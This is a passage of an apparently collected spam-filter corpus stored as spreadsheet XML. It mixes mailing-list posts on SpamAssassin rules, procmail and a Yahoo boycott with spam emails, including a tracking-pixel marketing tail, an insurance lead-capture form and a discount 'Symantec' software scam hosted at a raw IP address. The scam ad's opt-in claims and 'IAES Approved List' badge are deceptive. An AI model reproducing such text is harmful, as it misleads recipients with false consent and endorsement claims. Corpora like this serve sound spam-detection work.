 &gt;      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;        &lt;table wi=
 dth=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;         &lt;tr&gt;=
             &lt;td&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;=
 a href=3D"http://www.tesco.ie/Register/"&gt;&lt;img src=3D"http://www.12hs.com/im=
 ages/tesco/8/clubcard.gif" width=3D"120" height=3D"57" border=3D"0"&gt;&lt;/a&gt;&lt;/b=
 &gt;&lt;/font&gt;&lt;/td&gt;           &lt;td align=3D"right"&gt;&lt;font size=3D"2" face=3D"Arial,=
  Helvetica, sans-serif" color=3D"#000099"&gt;&lt;b&gt;Remember              you earn=
  Clubcard points on every purchase&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;         &lt;/tr&gt;       &lt;/ta=
 ble&gt;     &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;      &lt;td wid=
 th=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;        &lt;p&gt;&lt;font size=3D"1" fac=
 e=3D"Verdana, Arial, Helvetica, sans-serif"&gt;* Helpline          open 9am - =
 11pm Mon to Sat, 10am - 6pm sun&lt;/font&gt;&lt;font size=3D"1" face=3D"Verdana, Ari=
 al, Helvetica, sans-serif"&gt;          &lt;br&gt;         &lt;br&gt;         If you would=
  prefer not to receive emails with news and special offers          from Te=
 sco.ie, please click here: Unsubscribe. It may take up to five &lt;P style=3D"=
 margin: 0px 0px 0px 0px"&gt; working days to &lt;A HREF=3D"http://www.twelvehorse=
 s.com/mm/Clickthrough/26447543/26450850/23333143/5NGp6tsciMBWBAxvERCbPMC.Nj=
 gA/*http://www.tesco.ie/register/unsubscribe.asp?from=3Djm@jmason.org*http:=
 //www.tesco.ie/register/unsubscribe.asp?from=3D" TARGET=3D"_blank"&gt;unsubscr=
 ibe&lt;/A&gt;. &lt;/font&gt;&lt;/p&gt;&lt;/P&gt;      &lt;/td&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr=
 &gt;   &lt;tr&gt;     &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;     &lt;td width=3D"486"&gt;&amp;nbsp;&lt;/td&gt;=
      &lt;td width=3D"35"&gt;&amp;nbsp;&lt;/td&gt;   &lt;/tr&gt; &lt;/table&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;=
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;&lt;TABLE ID=3D"table2" BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WID=
 TH=3D556&gt;&lt;tr width=3D556 BGCOLOR=3D"#183C8C" &gt;&lt;td width=3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;td=
  width=3D135&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D156&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D135&gt;&amp;nbsp;&lt;/=
 td&gt;&lt;td width=3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;TR  BGCOLOR=3D"#183C8C"  &gt;&lt;TD WIDTH=3D35=
 6 ALIGN=3DLEFT COLSPAN=3D3 &gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF=3D"http://www.twelvehorses.=
 com/en_US/wrapper/unsubscribe.jhtml?m=3D26450850&amp;c=3D23333143&amp;w=3D26447543&amp;=
 h=3D5NGp6tsciMBWBAxvERCbPMC.NjgA"&gt;&lt;FONT COLOR=3D"#183C8C" FACE=3D"Arial,Hel=
 vetica,sans-serif" SIZE=3D1&gt;.&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/TD&gt;&lt;TD ALIGN=3DRIGHT =
 VALIGN=3DCENTER WIDTH=3D200 COLSPAN=3D2&gt;&lt;IMG SRC=3D"http://www.twelvehorses=
 .com/mm/MarkRead?m=3D26450850&amp;c=3D23333143&amp;w=3D26447543&amp;h=3D5NGp6tsciMBWBAx=
 vERCbPMC.NjgA" BORDER=3D0 ALT=3D" " HEIGHT=3D40 WIDTH=3D108 &gt;&lt;/TD&gt;&lt;/TR&gt;&lt;tr =
 width=3D556 BGCOLOR=3D"#183C8C" &gt;&lt;td width=3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D135&gt;=
 &amp;nbsp;&lt;/td&gt;&lt;td width=3D156&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D135&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=
 =3D65&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/TABLE&gt;
 ------=_Part_90740_3115243.1036431255782--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Re: [SAtalk] SpamAssassin and unconfirmed.dsbl.org
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt; Folks who've been hacking on the DNSBLs: would it be worthwhile commenting
 &gt; this in HEAD, seeing as it only gets .77 anyway?
 &gt; 
 &gt; Sounds like the (a) broken server and (b) low hitrate combine to make it
 &gt; not-so-useful IMO.
 No, in my opinion, it's purely a bug in SA (or the libraries we use,
 which is the same thing) that we don't handle outages of network
 services better.
 The rule is useful and it does help reduce spam, we should keep it.  I
 have a feeling the DNSBL rules will cluster a bit more heavily around
 the 1.0 to 2.0 range once we start using the new GA on them.
 Also, 0.77 was a slightly conservative number.  Since I didn't have
 real-time data, I typically used the lower or median number of different
 periods (most recent month, two months, six months), depending on the
 trend of the period data (better performance for recent messages -&gt;
 favor recent scores, worse performance for recent messages -&gt; favor
 lowest scores, never pick the highest number unless the rule was very
 accurate and the highest number was for the most recent data).
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: This is NO JOKE! Speed up your CPU for under $30!
</t>
  </si>
  <si>
    <t xml:space="preserve">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   Take Control of Your Computer With This Top-of-the-Line Software! 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                  Symantec SystemWorks 2002
               -=Professional Software Suite=-
 This Special Package Includes Six - Yes 6! - Feature-Packed Utilities
 ALL for 1 Special LOW Price of Only $29.99!
 This Software Will:
  - Protect your computer from unwanted and hazardous viruses
  - Help secure your private &amp; valuable information
  - Allow you to transfer files and send e-mails safely
  - Backup your ALL your data quick and easily
  - Improve your PC's performance w/superior integral diagnostics!
  - ***** You'll NEVER have to take your PC to the repair shop AGAIN! *****
         That's SIX, yes, -6- Feature-Packed Utilities @ 1 Great Price!!!
     A $300+ Combined Retail Value YOURS Only $29.99! (Limited Time Offer)
                       &lt; Price Includes FREE Shipping! &gt;
          Why SO Cheap you ask? You are buying ONLINE WHOLESALE,
                   Direct from the Warehouse TO YOU!
                               ~~~ AND ~~~
          FOR A LIMITED TIME BUY 2 OF ANY SOFTWARE &amp; GET 1 FREE!!!!
             Don't fall prey to destructive viruses or programs!
           Protect your computer and your valuable information and...
           ...CLICK HERE TO ORDER NOW! -&gt; http://61.151.247.39/erik/
              OR cut &amp; paste the above link  ^^^^^^^^^^^^^^^^  in your browser's URL bar.
           FOR MORE QUESTIONS, OR TO ORDER CALL US TOLL-FREE ANYTIME!
                          1 - 8 0 0 - 8 6 1 - 1 4 8 1
 We are strongly against sending unsolicited emails to those who do not wish to receive
 our special mailings. You have opted-in to one or more of our affiliate sites requesting
 to be notified of any special offers we may run from time to time. We also have attained
 the services of an independent 3rd party to overlook list management and removal
 services. The list CODE in which you are registered is marked at the bottom of this email.
 If you do not wish to receive further mailings, 
 Please click here -&gt; http://61.151.247.39/erik/remove.asp to be removed from the list.
 Please accept our apologies if you have been sent this email in error. We honor all removal requests. 
 IAES (International Association of Email Security) Approved List. Serial # 9e45tYu2-ssI3USA
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Balloon flight challenges deflate
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251868,1440/
 Date: Not supplied
 Technical problems beat a transatlantic record attempt, as the weather beats an 
 altitude record attempt - for now
</t>
  </si>
  <si>
    <t xml:space="preserve">In message &lt;200210091843.OAA01268@hippolyta.crd.ge.com&gt;, Kevin Kenny said:
 &gt; 
 &gt; mcmasjc@tatanka.stortek.com said:
 &gt; &gt; 3)  You can learn to use procmail,
 &gt; 
 It absolutely can be done from .forward.  I am in the same situation as you, 
 and that is how I do it.
 -- 
 Jim McMaster
 mailto:mcmasjc@tatanka.stortek.com
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Gateway to Wealth
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1034F3_01C259AF.CA052980
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Welcome to Jefferson Pilot's
  Gateway to Wealth
  As one of the industry's premier producers, you must continually seek
 qualified cutting edge services.
  Financial Profiles	
  Concept	Profiles+ Professional is a personal and business
 analysis tool that analyzes a client's insurance, investment and
 financial planning goals, to help them see their situation today
 compared to their objectives. 	
  Market	Profiles+ Professional is an ideal tool for true financial
 planning. It not only provides a thorough analysis, including asset
 allocation, but it can calculate tax implications in a client's plan.
 Due to its modular format, it can be used for specific planning needs,
 as well as more comprehensive planning. 	
  Benefits
 This software not only provides exceptional analysis, but excels in
 providing simple as well as comprehensive presentation pages. By
 uncovering multiple needs, producers sell more products.	 
  Deferral+	
  Concept	An internet-based "sales-enabling" service, which allows
 users to quickly become successful in the deferred compensation (COLI)
 market. 	
  Market	Focus on mid-market businesses. In the area of executive
 benefits, the mid-market opportunity should be defined by either the
 number of employees within a company, or more specifically by the number
 of highly compensated executives within a company.	 
  Benefits
 A turnkey program that includes qualification of prospect, marketing and
 sales support, case design, plan documents and administration. 	
  G.I.F.T.	
  Concept	Global Insurance Funding Transaction (G.I.F.T.) is a
 sophisticated premium-financing program that provides an alternative
 funding mechanism for life products purchased to offset large estate and
 corporate liabilities. 	
  Market	Clients with a high net worth of at least $10 million who have
 an insurance need and believe their existing portfolio of investments,
 when left unliquidated, will earn more then they will have to pay on
 loan interest expenses. 	
  Benefits
 G.I.F.T. offers compelling sales solutions, comprehensive supplemental
 illustrations and access to a consortium of established banks willing
 and able to lend in this market. Loans are available in both U.S.
 dollars and Japanese Yen. 	
 Please fill out the form below for more information	 
 Name:	 	 
 E-mail:	 	 
 Phone:	 	 
 City:	 	 State:	 	 Zip:	 	 
 Primary Insurance Carrier:	 	 
 Broker-Dealer:	 	 
  	If you are currently contracted with any of the 
 Jefferson Pilot Financial family of companies, 
 please disregard this ad.
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; 
 ------=_NextPart_000_1034F3_01C259AF.CA052980
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Your Gateway to Wealth&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;=20
   &lt;table width=3D"550" border=3D"3" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#003333"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/top.jpg" width=3D"550" =
 height=3D"81" alt=3D"Welcome to Jefferson Pilot's"&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/jefferson/mid.jpg" =
 width=3D"550" height=3D"134" alt=3D'Gateway to Wealth'&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/jefferson/tag.jpg" =
 width=3D"550" height=3D"94" alt=3D"As one of the industry's premier =
 producers, you must continually seek qualified cutting edge =
 services."&gt;&lt;br&gt;
               &lt;img src=3D"http://iiq.us/images/jefferson/financial.gif" =
 width=3D"159" height=3D"30" alt=3D'Financial Profiles'&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/concept.gif" width=3D"70" =
 height=3D"23" alt=3D'Concept'&gt;&lt;/td&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Profiles+=20
               Professional is a personal and business analysis tool that =
 analyzes=20
               a client's insurance, investment and financial planning =
 goals, to=20
               help them see their situation today compared to their =
 objectives.=20
               &lt;/font&gt; &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5" height=3D"21"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/market.gif" width=3D"70" =
 height=3D"23" alt=3D'Market'&gt;&lt;/td&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Profiles+=20
               Professional is an ideal tool for true financial planning. =
 It not=20
               only provides a thorough analysis, including asset =
 allocation, but=20
               it can calculate tax implications in a client's plan. Due =
 to its=20
               modular format, it can be used for specific planning =
 needs, as well=20
               as more comprehensive planning. &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/benefit.gif" width=3D"71" =
 height=3D"23" alt=3D'Benefits'&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;This=20
               software not only provides exceptional analysis, but =
 excels in providing=20
               simple as well as comprehensive presentation pages. By =
 uncovering=20
               multiple needs, producers sell more products.&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/deferral.gif" width=3D"105" =
 height=3D"31" alt=3D'Deferral+'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/concept.gif" width=3D"70" =
 height=3D"23" alt=3D'Concept'&gt;&lt;/td&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;An=20
               internet-based &amp;quot;sales-enabling&amp;quot; service, which =
 allows=20
               users to quickly become successful in the deferred =
 compensation=20
               (COLI) market. &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5" height=3D"21"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/market.gif" width=3D"70" =
 height=3D"23" alt=3D'Market'&gt;&lt;/td&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               Focus on mid-market businesses. In the area of executive =
 benefits,=20
               the mid-market opportunity should be defined by either the =
 number=20
               of employees within a company, or more specifically by the =
 number=20
               of highly compensated executives within a =
 company.&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/benefit.gif" width=3D"71" =
 height=3D"23" alt=3D'Benefits'&gt;&lt;/div&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               A turnkey program that includes qualification of prospect, =
 marketing=20
               and sales support, case design, plan documents and =
 administration.=20
               &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/gift_blink.gif" width=3D"82" =
 height=3D"27" alt=3D'G.I.F.T.'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/concept.gif" width=3D"70" =
 height=3D"23" alt=3D'Concept'&gt;&lt;/td&gt;
             &lt;td width=3D"462"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;Global=20
               Insurance Funding Transaction (G.I.F.T.) is a =
 sophisticated premium-financing=20
               program that provides an alternative funding mechanism for =
 life=20
               products purchased to offset large estate and corporate =
 liabilities.=20
               &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5" height=3D"21"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/market.gif" width=3D"70" =
 height=3D"23" alt=3D'Market'&gt;&lt;/td&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               Clients with a high net worth of at least $10 million who =
 have an=20
               insurance need and believe their existing portfolio of =
 investments,=20
               when left unliquidated, will earn more then they will have =
 to pay=20
               on loan interest expenses. &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"5"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"88" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/benefit.gif" width=3D"71" =
 height=3D"23" alt=3D'Benefits'&gt;&lt;/div&gt;
             &lt;td width=3D"462"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;=20
               G.I.F.T. offers compelling sales solutions, comprehensive =
 supplemental=20
               illustrations and access to a consortium of established =
 banks willing=20
               and able to lend in this market. Loans are available in =
 both U.S.=20
               dollars and Japanese Yen. &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#003333"&gt;=20
                           &lt;td colspan=3D"6" align=3D"center"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;Please fill out the form below for more =
 information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"32%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"5"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"32%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"5"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"32%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"5"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"32%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                           &lt;td width=3D"7%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;State:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"4%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                           &lt;td valign=3D"middle" width=3D"5%" =
 align=3D"right"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Zip:&lt;/font&gt;&lt;/td&gt;
                           &lt;td valign=3D"middle" width=3D"32%"&gt;&lt;input =
 type=3D"text" name=3D"ZIP" size=3D"9"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                       &lt;table width=3D"550" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2"&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"153" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Primary Insurance =
 Carrier:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"389"&gt;&lt;input type=3D"text" =
 name=3D"Ins Carrier" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"153" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Broker-Dealer:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"389"&gt;&lt;input type=3D"text" =
 name=3D"Broker-Dealer" size=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                       &lt;table width=3D"550" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"0"&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"234" align=3D"right"&gt;=20
                               &lt;input type=3D"submit" name=3D"Submit" =
 value=3D"Submit"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"205"&gt;=20
                             &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"wendy.quigg@jpfinancial.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"Jefferson Pilot Inquiry"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"111"&gt;&lt;img =
 src=3D"http://iiq.us/images/q2.gif" width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"138" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/jefferson/logo.gif" width=3D"131" =
 height=3D"87"&gt;&lt;/td&gt;
             &lt;td width=3D"412"&gt;=20
               &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;
                 If you are currently contracted with any of the &lt;br&gt;
                 Jefferson Pilot Financial family of companies, &lt;br&gt;
                 please disregard this ad.&lt;/b&gt;&lt;/font&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;br&gt;
                 We don't want anybody to receive our mailing who does =
 not wish=20
                 to receive them. This is a professional communication =
 sent to=20
                 insurance professionals. To be removed from this mailing =
 list,=20
                 DO NOT REPLY to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout"&gt;http://www.insuranceiq.com/opt=
 out&lt;/a&gt;&lt;br&gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1034F3_01C259AF.CA052980--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: boycotting yahoo
</t>
  </si>
  <si>
    <t xml:space="preserve">Well I don't think China could force Yahoo! to give up info.  So if they 
 are so willing to give it, why wouldn't they be willing to give info to 
 some silly group who may one day decide to get a hair up their ass about 
 the practice of BDSMers? (not to mention folks who don't even practice, 
 but who are just interested in information) What about folks who are 
 interested in talking about software security issues?  Didja read about 
 the guy in China who got 11 years for downloading and printing out pro-democracy 
 info?
 http://www.democracy.org.hk/EN/2002/aug/news_04.html
 I'm confused about what you're confused about.
 Cindy
 On 18 Sep 2002, Gary Lawrence Murphy wrote:
 &gt; 
 &gt; I'm a bit confused about this boycott thing.  How is what China is
 &gt; doing any different than having Scientology and who ever else
 &gt; state-side who takes the whim evoking the DMCA to close down foreign
 &gt; sites they deem inappropriate?  At least the Chinese make it voluntary
 &gt; and ask politely, rather than just sending legal musclemen first off.
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[3]: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">Here are numbers that come from a study of a couple of thousand swedes, with 
 no reference to sexual preference that I could find. The point would seem to 
 be that (1) sexual activity follows a power curve, with a few people, a la 
 Wilt Chamberlain, having an extaordinarily large number of sexual contacts, 
 ev en in a short period of time and (2) a tendency for men to have more 
 partners than women.  I have no idea, being a statistical ignoramus, whether 
 the fact that there seem to be more men than women at the extremely 
 promiscuous end of the sex-partners-distribution curve means that you'd get 
 even more extreme results in a group of men who chiefly have sex with other 
 men. 
 http://polymer.bu.edu/~amaral/Sex_partners/Content_sex.html
 &lt;&lt;For example, the mean number of partners since sexual initiation for women 
 is approximately 7 and in a sample of less than 1500 Swedish women we find an 
 individual with 100 partners. For men, the mean is approximately 15 and we 
 find an individual with 800 partners, which is almost 50 times larger than 
 the mean! So, somehow Don Juan was not such an extraordinary case but just 
 one data point in a wide spectrum of behaviors that can be observed. &gt;&gt;
 As for gay men: There is indeed anecdotal evidence of cases of extreme 
 promiscuity among gay men. You can read about it in Randy Schiltz's And the 
 Band Played On. He writes about  bathhouse culture pre-HIV; he also discusses 
 how, in the gay politics of the time, there was a sub-culture of what you 
 might call radical gay men who argued (and acted on the argument) that having 
 many partners was an essential part of what being gay actually was. It was an 
 explicitly political statement: monogamy is an artifact of straight culture.
     That view seems to have died, in more ways than one. Part of the point of 
 Schiltz's book was to condemn the role that it and  bathhouse culture played 
 in spreading the AIDs epidemic that eventually killed Schiltz, among so many 
 others. This doesn't let Eugen off the hook--but it is accurate to say that 
 there was a  cult of promiscuity that was particular to the gay community.
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: results for giant mass-check (phew)
</t>
  </si>
  <si>
    <t xml:space="preserve">I never claimed it could learn *all* combinatorial 
 possibilities, but it certainly can learn some.
 C
